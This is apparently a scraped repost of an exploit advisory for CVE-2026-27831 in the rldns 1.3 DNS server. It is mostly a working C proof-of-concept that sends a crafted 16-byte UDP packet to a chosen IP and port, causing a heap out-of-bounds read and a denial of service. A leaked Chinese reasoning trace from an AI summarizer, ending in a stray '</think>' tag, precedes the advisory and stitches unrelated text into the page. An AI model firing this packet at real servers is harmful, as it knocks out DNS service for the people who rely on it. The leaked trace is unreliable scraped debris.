rldns-1.3 remote denial of service
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容。 文章标题是“rldns-1.3远程拒绝服务”,看起来是关于一个漏洞的。作者Antonius在2026年2月26日发布的。软件链接是https://indodev.asia/downloads/rldns-1.3.tar.bz2,版本是1.3,测试环境是Kali Linux 2025,CVE编号是CVE-2026-27831。 描述部分提到这是一个远程堆基的越界读取漏洞,导致拒绝服务。rldns是一个开源的DNS服务器,支持Linux、FreeBSD和NetBSD,运行在x86_64架构上。版本1.4已经修复了这个问题。 接下来是代码部分,看起来是一个利用这个漏洞的Exploit程序。它创建了一个UDP套接字,发送一个特定的数据包到目标IP和端口。数据包的内容是固定的字节序列。 参考链接包括GitHub、Medium、CVE官网和Packetstorm.news,这些地方可能有更多关于这个漏洞的信息。 现在我需要总结这篇文章的内容。重点包括:rldns 1.3存在堆基越界读取漏洞,导致DoS;作者Antonius;影响版本1.3;修复版本1.4;CVE编号;以及提供了一个Exploit代码。 控制在100字以内的话,我需要简洁明了地表达这些信息。例如:“rldns 1.3存在远程堆基越界读取漏洞,导致拒绝服务(CVE-2026-27831)。该漏洞由Antonius发现并提供POC代码。” 这样既涵盖了主要信息又符合字数限制。 </think> rldns 1.3 存在远程堆基越界读取漏洞(CVE-2026-27831),导致拒绝服务。该漏洞由 Antonius 发现并提供概念验证代码。 2026-2-26 18:37:45 Author: cxsecurity.com(查看原文) 阅读量:0 收藏

rldns-1.3 remote denial of service

/* # Exploit Title: rldns-1.3 remote denial of service # Google Dork: N/A # Date: 2026-02-26 # Exploit Author: Antonius # Vendor Homepage: https://indodev.asia # Software Link: https://indodev.asia/downloads/rldns-1.3.tar.bz2 # Version: 1.3 # Tested on: Kali linux 2025 # CVE : CVE-2026-27831 # Description: This is proof of concept exploit for remote heap based out-of-bound read at rldns version 1.3. rldns is an open source DNS server for linux, freebsd & netbsd, running on x86_64 architecture. Rldns Version 1.3 has a heap-based out-of-bounds read that leads to denial of service. Version 1.4 contains a patch for the issue. Vulnerability discovered by : Antonius */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <arpa/inet.h> #include <unistd.h> int main(int argc, char *argv[]) { int sock; struct sockaddr_in server; unsigned char packet[] = {0x12, 0x34, 0x34, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x41, 0x42, 0xff}; if (argc < 3) { printf("[-] usage : ./exploit <target ip> <port number>"); exit(-1); } char *ip = argv[1]; int port = atoi(argv[2]); sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("[-] failed to create socket"); exit(-1); } server.sin_family = AF_INET; server.sin_port = htons(port); inet_pton(AF_INET, ip, &server.sin_addr); ssize_t sent = sendto(sock, packet, 16, 0, (const struct sockaddr *)&server, sizeof(server)); if (sent < 0) { perror("Sendto failed"); } else { printf("Successfully sent %zd bytes to %s:%d\n", sent, ip, port); } close(sock); return 0; }

References:

https://github.com/bluedragonsecurity/rldns-1.3-heap-out-of-bounds-vulnerability-fixed-in-rldns-1.4

https://medium.com/@w1sdom/heap-based-buffer-over-read-vulnerability-in-rldns-1-3-5da3bccdc031

https://www.cve.org/CVERecord?id=CVE-2026-27831

https://packetstorm.news/files/id/216107/




 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2026020028
如有侵权请联系:admin#unsafe.sh